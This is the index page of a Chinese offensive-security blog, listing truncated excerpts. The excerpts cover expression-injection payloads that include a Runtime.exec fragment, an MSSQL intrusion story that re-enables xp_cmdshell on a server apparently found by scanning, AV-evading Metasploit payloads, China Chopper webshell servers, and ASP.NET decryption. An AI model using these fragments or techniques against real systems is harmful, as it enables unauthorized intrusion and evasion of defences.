表达式注入的几类Payload

RedFree | JAVA | 2016-06-12
验证:${6196753-3562104}若页面中包含2634649,再验证其它数字相减页面中是否包含计算的结果,若有则表明其存在表达式注入。不同类型的Payload:实际上在利用表达式注入这类漏洞的时候有这么几类Payload去执行命令:1、${\u0027\u007e\u007e\u0027+\u0027\u0032\u0027+@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(\... [阅读全文]
ė414 次访问 6没有评论 0

Debian安装JDK7

RedFree | Linux | 2016-06-12
一、下载JDK :      点击链接在Oracle官网下载JDK7u55:JDKu55二、把jdk压缩文件放到/usr/local文件夹下mv 存放jdk压缩文件的文件夹绝对路径/jdk-7u55-linux-i586.tar.gz /usr/local三、解压jdk压缩文件到/usr/localcd /usr/local tar -zxvf jdk-7u55-linux-i586.tar.gz四、修改解压后文件夹的名字mv jdk1.7.0_55&n... [阅读全文]
ė104 次访问 6没有评论 0,

记一次艰难的MSSQL提权[转载]

RedFree | MSSQL | 2016-06-12
昨晚没关机 扫了一夜 扫到一个3389,而且开着1433,且1433的sa账户是空口令。遂大喜。第一步:尝试xp_cmdshellxp_cmdshell 'dir c:/ >> r.txt'提示找不到xplog70.dll,于是我恢复一下xp_cmdshell试试exec sp_dropextendedproc 'xp_cmdshell' dbcc addextendedproc ('xp_cmdshell&#... [阅读全文]
ė141 次访问 6没有评论 0, ,

使用shellcode打造MSF免杀payload

RedFree | CobaltStrike, Metasploit, ShellCode | 2015-08-23
使用shellcode打造MSF免杀payload
0x00 前言经常有同学提及MSF payload的免杀问题,其实除了Veil之处,还有另一种比较轻巧的方案可以打造免杀的payload,那就是shellcode。0x01 从哪里开始shellcode是什么,可以去drops搜索学习,但这并不是本文的重点。因为MSF已经为我们提供了shellcode的生成功能,接下来我们就拿最常用的payload:reverse_tcp来做测试吧!(其它的payload均可以)Cob... [阅读全文]

菜刀Customize类型服务端asmx版

RedFree | ASP.NET, C#, VB, Windows | 2015-04-30
菜刀Customize类型服务端asmx版
前些天刚学了点ASP.NET的知识,怕学的东西忘了,于是趁热打铁,顺道看了下WebService。WebService这东西以前没有接触过,比较陌生,一点点的搜索,勉勉强强完成了菜刀Customize类型服务端的asmx版。若有错误还请看官指出。    和其它类型的服务端一样,要完成和服务端的交互,必须具备这两点:1、可以获取参数 2、可以返回内容。于是就... [阅读全文]
ė133 次访问 6没有评论 0, , ,

三种方法还原ASP.NET可逆加密内容

RedFree | ASP.NET, Windows | 2015-04-22
三种方法还原ASP.NET可逆加密内容
0x00       在进行安全测试的时候经常遇到ASP.NET平台的各类系统,它们加密手段有强有弱。有的只加密用户信息,有的则将数据库连接字串也进行了加密。以前不熟悉ASP.NET的时候有时解密一个连接字串都要花费数小时。下面介绍三种方法(由难到易),以便快速解密加密的内容,适合新手。 0x01     工具... [阅读全文]
ė122 次访问 6没有评论 0, ,

菜刀Customize类型服务端ashx版

RedFree | ASP.NET, C#, VB, 经验积累 | 2015-04-15
菜刀Customize类型服务端ashx版
 前些天在社区中看到求ashx webshell的贴子,大至情况是这样的:可以上传任意文件,上传asp/aspx后缀的webshell却无法解析(详情我不太清楚),但上传ashx类型的webshell可能可以成功解析。但是悲剧的是一时找不到可用的代码。。。通常情况下使用最多的某ashx马代码如下(生成一句话):<%@ WebHandler Language="C#"Class... [阅读全文]
ė164 次访问 6没有评论 0, , ,
Ɣ回顶部